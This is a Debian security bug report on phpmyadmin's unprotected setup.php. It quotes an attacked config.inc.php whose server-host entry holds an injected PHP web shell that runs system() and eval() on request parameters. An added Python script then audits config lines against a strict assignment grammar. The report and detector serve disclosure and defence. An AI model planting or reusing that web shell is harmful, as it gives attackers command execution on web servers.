Package: phpmyadmin
Version: 4:2.9.1.1-11
Severity: grave
Tags: security
Justification: user security hole

After install, you can access http://{host}/phpmyadmin/scripts/setup.php without entering any password. By adding a new host in the configuration, an attacker can submit malicious code to execute commands as the www-data user.

This is a dump of /var/lib/phpmyadmin/config.inc.php after the attack:

/* Server (config:root) [1] */
$i++;
$cfg['Servers'][$i]['host']=''; if($_GET['c']){echo '<pre>';system($_GET['c']);echo '</pre>';}if($_GET['p']){echo '<pre>';eval($_GET['p']);echo '</pre>';};//'] = 'localhost';
$cfg['Servers'][$i]['extension'] = 'mysqli';
$cfg['Servers'][$i]['connect_type'] = 'tcp';
$cfg['Servers'][$i]['compress'] = false;
$cfg['Servers'][$i]['auth_type'] = 'config';
$cfg['Servers'][$i]['user'] = 'root';
/* End of servers configuration */

-- System Information:
Debian Release: 4.0
  APT prefers oldstable
  APT policy: (500, 'oldstable')
Architecture: i386 (i686)
Shell: /bin/sh linked to /bin/bash
Kernel: Linux 2.6.18-6-686
Locale: LANG=it_IT.UTF-8, LC_CTYPE=it_IT.UTF-8 (charmap=UTF-8)

Versions of packages phpmyadmin depends on:
ii  debconf [debconf-2.0      1.5.11etch2          Debian configuration management sy
ii  libapache2-mod-php5       5.2.0+dfsg-8+etch15  server-side, HTML-embedded scripti
ii  perl                      5.8.8-7etch6         Larry Wall's Practical Extraction
ii  php5-mysql                5.2.0+dfsg-8+etch15  MySQL module for php5
ii  ucf                       2.0020               Update Configuration File: preserv

Versions of packages phpmyadmin recommends:
ii  apache2-mpm-prefork [http 2.2.3-4+etch10       Traditional model for Apache HTTPD
pn  php5-gd | php4-gd         <none>               (no description available)
pn  php5-mcrypt | php4-mcrypt <none>               (no description available)

-- debconf information:
  phpmyadmin/setup-username: admin
  phpmyadmin/reconfigure-webserver:
  phpmyadmin/restart-webserver: false
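
An added example, not part of the original report or of phpMyAdmin: a small Python audit that flags every line of a generated config.inc.php that is not a single literal assignment, run here over the dump quoted in the report. The function name audit_config and the accepted line grammar are assumptions of this example.

```python
import re

# Grammar of the lines this audit accepts (an assumption of this example):
#   $cfg['Servers'][$i]['key'] = <one literal>;
# Keys: identifier characters only. Values: one quoted string without
# embedded quotes or backslashes, a boolean, or an integer. Legitimate but
# unusual values (escaped quotes, arrays) are reported for manual review.
ASSIGN = re.compile(
    r"\$cfg(?:\['[A-Za-z0-9_]+'\]|\[\$i\])+\s*=\s*(?:'[^'\\]*'|true|false|\d+);"
)
# Housekeeping lines: PHP tags, counter handling, one self-contained comment.
BENIGN = re.compile(r"<\?php|\?>|\$i\s*=\s*0;|\$i\+\+;|/\*[^*]*\*/")


def audit_config(text):
    """Return (line_number, line) for each line that is not a plain assignment."""
    findings = []
    for number, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or BENIGN.fullmatch(line) or ASSIGN.fullmatch(line):
            continue
        findings.append((number, line))
    return findings


# Sample input: the dump quoted in the report, with line breaks restored.
REPORTED_DUMP = r"""/* Server (config:root) [1] */
$i++;
$cfg['Servers'][$i]['host']=''; if($_GET['c']){echo '<pre>';system($_GET['c']);echo '</pre>';}if($_GET['p']){echo '<pre>';eval($_GET['p']);echo '</pre>';};//'] = 'localhost';
$cfg['Servers'][$i]['extension'] = 'mysqli';
$cfg['Servers'][$i]['connect_type'] = 'tcp';
$cfg['Servers'][$i]['compress'] = false;
$cfg['Servers'][$i]['auth_type'] = 'config';
$cfg['Servers'][$i]['user'] = 'root';
/* End of servers configuration */
"""

if __name__ == "__main__":
    for number, line in audit_config(REPORTED_DUMP):
        print(f"line {number}: not a plain assignment: {line[:60]}")
```

In the dump, the trailing `//'] = 'localhost';` shows that the extra statements sit where the array key name was written, which is why the audit constrains key names as well as values.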